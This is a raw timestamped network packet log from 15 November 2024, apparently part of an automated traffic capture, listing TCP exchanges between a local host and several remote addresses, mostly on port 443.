                                                                                      Nov 15, 2024 18:08:54.918768883 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.932672977 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:54.948649883 CET4968080192.168.2.16192.229.211.108
                                                                                      Nov 15, 2024 18:08:54.959518909 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.960078955 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.960148096 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:54.960176945 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.960311890 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.960405111 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.960462093 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:54.960469961 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.960706949 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:54.961046934 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.961273909 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.961332083 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:54.961337090 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.964653015 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:54.964674950 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.991770029 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.991867065 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:54.991883993 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.991957903 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:54.992404938 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.992424965 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:54.992471933 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.012684107 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.033804893 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.033842087 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.033905029 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.033914089 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.033941984 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.034086943 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.034151077 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.034158945 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.034249067 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.076469898 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.076494932 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.076545000 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.077008009 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.077084064 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.077099085 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.077181101 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.077267885 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.077980042 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.078033924 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.078041077 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.078098059 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.107518911 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.107549906 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.107608080 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.107929945 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.107995987 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.108007908 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.108066082 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.118088961 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.118119955 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.118165970 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.149283886 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.149317026 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.149375916 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.149512053 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.149533033 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.149574041 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.149574041 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.172666073 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.193886042 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.193905115 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.193967104 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.194525003 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.194542885 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.194586992 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.194597960 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.195091963 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.195111036 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.195144892 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.222739935 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.222835064 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.222851992 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.222862959 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.222876072 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.222908974 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.223551989 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.223608017 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.235013008 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.235071898 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.235089064 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.235136986 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.264697075 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.264830112 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.265125990 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.265192032 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.310553074 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.310575008 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.310659885 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.310879946 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.310913086 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.310939074 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.310962915 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.311619997 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.311638117 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.311680079 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.312370062 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.312431097 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.338285923 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.338391066 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.339193106 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.339261055 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.352566957 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.352649927 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.409115076 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.409202099 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.409503937 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.409569025 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.409607887 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.409766912 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.409832954 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.409843922 CET44362580104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.409854889 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.409893990 CET62580443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.427768946 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.427839994 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.428339005 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.428404093 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.428864956 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.428929090 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.469264984 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.469348907 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.469535112 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.469593048 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.545294046 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.545403004 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.545623064 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.545686960 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.546612024 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.546674967 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.586232901 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.586308956 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.586720943 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.586776018 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.586783886 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.586819887 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.586879969 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.586885929 CET44362582104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.586898088 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.586929083 CET62582443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.589596987 CET62584443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.589616060 CET44362584104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.590502977 CET62584443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.590780973 CET62584443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:55.590790033 CET44362584104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.786730051 CET62607443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.786814928 CET44362607104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:55.786904097 CET62607443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.787137985 CET62607443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:55.787177086 CET44362607104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.193360090 CET44362584104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.193644047 CET62584443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:56.193662882 CET44362584104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.194221973 CET44362584104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.194519997 CET62584443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:56.194613934 CET44362584104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.194647074 CET62584443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:56.235335112 CET44362584104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.237684965 CET62584443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:56.331435919 CET44362584104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.331623077 CET44362584104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.331721067 CET62584443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:56.332020998 CET62584443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:56.332065105 CET44362584104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.405361891 CET44362607104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.405667067 CET62607443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:56.405744076 CET44362607104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.406230927 CET44362607104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.406506062 CET62607443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:56.406601906 CET44362607104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.406622887 CET62607443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:56.451340914 CET44362607104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.461790085 CET62607443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:56.553006887 CET44362607104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.553078890 CET44362607104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.553132057 CET62607443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:56.615947962 CET62607443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:56.615993023 CET44362607104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.714035988 CET62639443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:56.714071035 CET44362639104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.714122057 CET62639443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:56.714363098 CET62639443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:56.714370966 CET44362639104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.977689981 CET62640443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:56.977754116 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:56.977833033 CET62640443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:56.978055000 CET62640443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:56.978085041 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.314712048 CET44362639104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.315026045 CET62639443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:57.315054893 CET44362639104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.315587997 CET44362639104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.315979958 CET62639443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:57.316051006 CET44362639104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.316133022 CET62639443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:57.353802919 CET4968080192.168.2.16192.229.211.108
                                                                                      Nov 15, 2024 18:08:57.359332085 CET44362639104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.463825941 CET44362639104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.463990927 CET44362639104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.464045048 CET62639443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:57.464602947 CET62639443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:57.464637995 CET44362639104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.586690903 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.586934090 CET62640443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:57.586992025 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.587500095 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.587794065 CET62640443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:57.587872028 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.587902069 CET62640443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:57.631371975 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.638701916 CET62640443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:57.686678886 CET49678443192.168.2.1620.189.173.10
                                                                                      Nov 15, 2024 18:08:57.733347893 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.733589888 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.733663082 CET62640443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:57.733724117 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.733757973 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:57.733807087 CET62640443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:57.734191895 CET62640443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:57.734225988 CET44362640104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:58.185533047 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:58.185566902 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:58.185759068 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:58.186153889 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:58.186165094 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:58.806690931 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:58.807054996 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:58.807071924 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:58.807532072 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:58.808284044 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:58.808284044 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:58.808296919 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:58.808367014 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:58.808418036 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:58.808428049 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:58.808473110 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:58.808643103 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:58.808650017 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.129658937 CET49673443192.168.2.16204.79.197.203
                                                                                      Nov 15, 2024 18:08:59.131020069 CET44349720142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.131076097 CET44349720142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.131210089 CET49720443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:08:59.247860909 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.247989893 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.248080015 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.248132944 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.248141050 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.248255014 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.248318911 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.248353004 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.248353004 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.248358965 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.248482943 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.248569965 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.248575926 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.252547026 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.252981901 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.252986908 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.303724051 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.366528988 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.366715908 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.366806030 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.366862059 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.366868019 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.367328882 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.486174107 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.486387968 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.486432076 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.487102032 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.487108946 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.487214088 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.487217903 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.487360001 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.487659931 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.487659931 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.489815950 CET49720443192.168.2.16142.250.184.228
                                                                                      Nov 15, 2024 18:08:59.489857912 CET44349720142.250.184.228192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.490108013 CET62642443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:59.490159988 CET44362642104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.490422010 CET62642443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:59.490748882 CET62642443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:08:59.490780115 CET44362642104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:08:59.797818899 CET62641443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:08:59.797838926 CET44362641104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:00.105171919 CET44362642104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:00.105515003 CET62642443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:00.105546951 CET44362642104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:00.106012106 CET44362642104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:00.106406927 CET62642443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:00.106492996 CET44362642104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:00.106559992 CET62642443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:00.151341915 CET44362642104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:00.253489971 CET44362642104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:00.253571987 CET44362642104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:00.253645897 CET62642443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:00.254194975 CET62642443192.168.2.16104.18.94.41
                                                                                      Nov 15, 2024 18:09:00.254234076 CET44362642104.18.94.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:02.164685965 CET4968080192.168.2.16192.229.211.108
                                                                                      Nov 15, 2024 18:09:02.243290901 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:02.243382931 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:02.244021893 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:02.244021893 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:02.244103909 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:02.840333939 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:02.840682983 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:02.840692043 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:02.841136932 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:02.841447115 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:02.841535091 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:02.841558933 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:02.841590881 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:02.841635942 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:02.841701031 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:02.841733932 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.150145054 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.150270939 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.150356054 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.150378942 CET62643443192.168.2.16104.18.95.41
                                                                                      Nov 15, 2024 18:09:03.150399923 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.150475025 CET44362643104.18.95.41192.168.2.16
                                                                                      Nov 15, 2024 18:09:03.150499105 CET62643443192.168.2.16104.18.95.41
